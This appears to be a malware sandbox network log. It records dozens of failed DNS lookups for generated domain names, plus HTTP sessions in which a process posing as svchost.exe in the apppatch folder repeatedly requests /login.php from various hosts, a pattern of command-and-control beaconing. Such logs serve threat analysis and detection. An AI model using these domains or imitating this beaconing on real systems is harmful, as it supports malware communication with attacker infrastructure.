                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.995263100 CET1.1.1.1192.168.2.60x3a4eName error (3)ganyzuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.998888016 CET1.1.1.1192.168.2.60xd616Name error (3)pupydev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.999064922 CET1.1.1.1192.168.2.60x12c2Name error (3)vopydaf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.000263929 CET1.1.1.1192.168.2.60x6dc9Name error (3)gacykas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.000413895 CET1.1.1.1192.168.2.60x4ea1Name error (3)gadyvez.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.003243923 CET1.1.1.1192.168.2.60xe990Name error (3)vocykec.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.004513979 CET1.1.1.1192.168.2.60x9e0fName error (3)puzyjov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.005705118 CET1.1.1.1192.168.2.60xc8bbName error (3)vowyzuf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.006298065 CET1.1.1.1192.168.2.60x61fName error (3)lyvylyx.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.006354094 CET1.1.1.1192.168.2.60xc26bName error (3)pumytyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.006767988 CET1.1.1.1192.168.2.60xf824Name error (3)purypig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.008805037 CET1.1.1.1192.168.2.60x607Name error (3)qedyvap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.011715889 CET1.1.1.1192.168.2.60xe65eName error (3)lykymij.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.011728048 CET1.1.1.1192.168.2.60x75c3Name error (3)pufybyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.011738062 CET1.1.1.1192.168.2.60xbd3fName error (3)gaqypuh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.011775017 CET1.1.1.1192.168.2.60xb138Name error (3)gahynuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.011785984 CET1.1.1.1192.168.2.60x2fceName error (3)lymytuj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.011840105 CET1.1.1.1192.168.2.60xb647Name error (3)qexykav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.012438059 CET1.1.1.1192.168.2.60x2607Name error (3)pujymiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.013333082 CET1.1.1.1192.168.2.60x6923Name error (3)qeqytuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.019747972 CET1.1.1.1192.168.2.60xee47Name error (3)lygynyr.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.020423889 CET1.1.1.1192.168.2.60x4c5fName error (3)lyryson.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.020639896 CET1.1.1.1192.168.2.60xf3dcName error (3)qegynul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.021332979 CET1.1.1.1192.168.2.60xe570Name error (3)vofybet.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.022628069 CET1.1.1.1192.168.2.60x9606Name error (3)gatydab.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.023792982 CET1.1.1.1192.168.2.60x5702Name error (3)vowypim.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.023983002 CET1.1.1.1192.168.2.60x1aa9Name error (3)volyjif.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.023993015 CET1.1.1.1192.168.2.60x5fddName error (3)qebylyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.025743008 CET1.1.1.1192.168.2.60x434bName error (3)puzymup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.025907993 CET1.1.1.1192.168.2.60xaafName error (3)lyxyjod.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.026793957 CET1.1.1.1192.168.2.60x5b6dName error (3)gadydow.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.029234886 CET1.1.1.1192.168.2.60xd499Name error (3)puvylep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.045886993 CET1.1.1.1192.168.2.60x90d7Name error (3)qetysog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.056747913 CET1.1.1.1192.168.2.60x3146Name error (3)vojymuk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.063158035 CET1.1.1.1192.168.2.60xb24fName error (3)gacyqoz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.065691948 CET1.1.1.1192.168.2.60x6b6aName error (3)vofydak.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.270553112 CET1.1.1.1192.168.2.60xc29fName error (3)pufydaq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.271038055 CET1.1.1.1192.168.2.60x9fc0Name error (3)vocyqot.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.272712946 CET1.1.1.1192.168.2.60x76faName error (3)qegyfeq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.272785902 CET1.1.1.1192.168.2.60xc017Name error (3)lyxymix.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.274270058 CET1.1.1.1192.168.2.60x6eabName error (3)lykygun.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.274290085 CET1.1.1.1192.168.2.60x7981Name error (3)gahyfyh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.277559042 CET1.1.1.1192.168.2.60xb238Name error (3)puvywal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.277570963 CET1.1.1.1192.168.2.60xddfdName error (3)vonyryk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.277580976 CET1.1.1.1192.168.2.60x33f6Name error (3)puryxuv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.277591944 CET1.1.1.1192.168.2.60x3de4Name error (3)lysyvax.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.281517982 CET1.1.1.1192.168.2.60x50f9Name error (3)vopycoc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.285053968 CET1.1.1.1192.168.2.60x3e59Name error (3)pupycop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.286583900 CET1.1.1.1192.168.2.60x4ff3Name error (3)pujygug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.291054964 CET1.1.1.1192.168.2.60x6dc6Name error (3)qeqylyg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.291460037 CET1.1.1.1192.168.2.60x45ddName error (3)lyryxud.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.293652058 CET1.1.1.1192.168.2.60x7ae0Name error (3)gaqyzyb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.293926001 CET1.1.1.1192.168.2.60x2e8fName error (3)qekyhug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.294855118 CET1.1.1.1192.168.2.60x4fb7Name error (3)lygyfej.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.304225922 CET1.1.1.1192.168.2.60x2ed8Name error (3)ganyrew.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.304832935 CET1.1.1.1192.168.2.60x4b1dName error (3)qexyqip.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.307132006 CET1.1.1.1192.168.2.60x1042Name error (3)qetyxiv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.518379927 CET1.1.1.1192.168.2.60xde2cName error (3)lyvywar.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.541362047 CET1.1.1.1192.168.2.60xe75cName error (3)gatycis.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:39.120558023 CET1.1.1.1192.168.2.60xeaeeName error (3)galyhib.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:39.139820099 CET1.1.1.1192.168.2.60x9ba0Name error (3)qebyrel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.300406933 CET1.1.1.1192.168.2.60x29e3Name error (3)lysyxuj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.304189920 CET1.1.1.1192.168.2.60x7367Name error (3)pupyxuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.304517031 CET1.1.1.1192.168.2.60x6385Name error (3)qekyfep.comnonenoneA (IP address)IN (0x0001)false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49714 | 18.208.156.248 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:27.962400913 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vonypom.com
Nov 11, 2024 18:50:28.382122040 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:28 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347428|1731347428|0|1|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49715 | 3.94.10.34 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:27.969291925 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lymyxid.com
Nov 11, 2024 18:50:28.394520044 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:28 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347428|1731347428|0|1|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49716 | 199.191.50.83 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:28.364603043 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: galyqaz.com
Nov 11, 2024 18:50:30.305301905 CET | 758 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:28 GMT
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                  Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                  Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                                  Set-Cookie: vsid=903vr478893028933998491; expires=Sat, 10-Nov-2029 17:50:28 GMT; Max-Age=157680000; path=/; domain=galyqaz.com; HttpOnly
                                                                                                                                                                                                                  Location: //ww8.galyqaz.com
                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
Nov 11, 2024 18:50:31.180229902 CET | 281 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: galyqaz.com
                                                                                                                                                                                                                  Cookie: vsid=903vr478893028933998491
Nov 11, 2024 18:50:32.160233021 CET | 620 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:31 GMT
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                  Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                  Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                                  Location: //ww3.galyqaz.com
                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
Nov 11, 2024 18:50:48.541954994 CET | 281 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: galyqaz.com
                                                                                                                                                                                                                  Cookie: vsid=903vr478893028933998491
Nov 11, 2024 18:50:49.655761957 CET | 861 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:49 GMT
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                  Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                  Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                                  Content-Length: 271
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Data Ascii: <html><head><meta name="robots" content="noarchive" /><meta name="googlebot" content="nosnippet" /></head><body><div align=center><h3>Error. Page cannot be displayed. Please contact your service provider for more details. (10)</h3></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49717 | 23.253.46.64 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:28.399502039 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gahyqah.com
Nov 11, 2024 18:50:28.853502035 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Server: Microsoft-IIS/7.5
                                                                                                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:23 GMT
                                                                                                                                                                                                                  Content-Length: 1245
                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 11, 2024 18:50:28.853533983 CET | 169 | IN
                                                                                                                                                                                                                  Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49718 | 188.114.96.3 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:28.415066004 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyhig.com
Nov 11, 2024 18:50:29.131983995 CET | 972 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:29 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: https://qegyhig.com/login.php
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L2WakQC1pF7YEFC7Sq8%2BNuvVrewozUUuxw9%2F%2BUMWRMWEqW3mLg69PFC6LRyCFavWY6C4DFYJrYw7hBF0szDswN5E03URBUXf4pvpW1H7%2Bh3GbxhTNNmwlb%2FtSpdOog%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e101ff5ef87436e-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1231&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Nov 11, 2024 18:50:31.289357901 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyhig.com
Nov 11, 2024 18:50:31.640822887 CET | 982 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:31 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: https://qegyhig.com/login.php
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RIwduwIy7RZ6%2FkLQBQf403pwfjWpAWiKjPeEO5OXIjxfrYJbWgCIofXatTuAtbmzfufLg8xaZW%2FBS12BukB0wzRQuMOXx303Q%2F7xy8Y%2FUDUdU%2Ffvs0S8eoH%2BqXzB2g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e102005cc2a436e-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1218&sent=4&recv=6&lost=0&retrans=0&sent_bytes=972&recv_bytes=486&delivery_rate=2367947&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Nov 11, 2024 18:50:48.291348934 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyhig.com
Nov 11, 2024 18:50:48.643071890 CET | 975 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:48 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: https://qegyhig.com/login.php
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P8rC8xQHXQATHg8yOimx3atl5fCpL8ZpSiV9cOkHfuqCIIImDg45nGGIepvPuXwFeLRbcMSnyQ%2FRu89fS6m8tPRsr%2F4Hs0BpQjQ19fkwSZuRdArEkDLykq4b2kCGpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e1020700e32436e-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1195&sent=7&recv=9&lost=0&retrans=0&sent_bytes=1954&recv_bytes=729&delivery_rate=2367947&cwnd=253&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Nov 11, 2024 18:50:50.023302078 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyhig.com
Nov 11, 2024 18:50:50.392663002 CET | 981 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:50 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: https://qegyhig.com/login.php
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SPhkxOzOMhFiNpMS9y92CWC8TzQKd9pjd91zXQqNhpTREZD2W%2B%2BeC2Obxh2B6mD0BcAIS6sN1SuWEzs6zHASSYc4zZoyE%2FfFfdP09m5FKPhdeqeaVaf%2FW5QgAv%2FNDA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e10207aed72436e-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1183&sent=10&recv=12&lost=0&retrans=0&sent_bytes=2929&recv_bytes=972&delivery_rate=2381578&cwnd=4&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
